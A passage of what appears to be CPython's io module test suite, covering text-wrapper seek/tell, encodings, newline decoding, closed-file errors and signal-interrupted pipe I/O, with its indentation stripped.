for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
def test_illegal_encoder(self):
# bpo-31271: A TypeError should be raised in case the return value of
# encoder's encode() is invalid.
class BadEncoder:
def encode(self, dummy):
return u'spam'
def get_bad_encoder(dummy):
return BadEncoder()
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True), \
support.swap_attr(rot13, 'incrementalencoder', get_bad_encoder):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
with self.assertRaises(TypeError):
t.write('bar')
t.flush()
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri_codec")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri_codec")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
#else:
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read, 1)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.readline)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri_codec")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
with self.maybeRaises(TypeError):
t.read(42)
t = _make_very_illegal_wrapper(())
with self.maybeRaises(TypeError):
t.read(42)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
class PyMiscIOTest(MiscIOTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
try:
with self.assertRaises(ZeroDivisionError):
wio.write(item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = [None]
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
error[0] = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error[0])
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
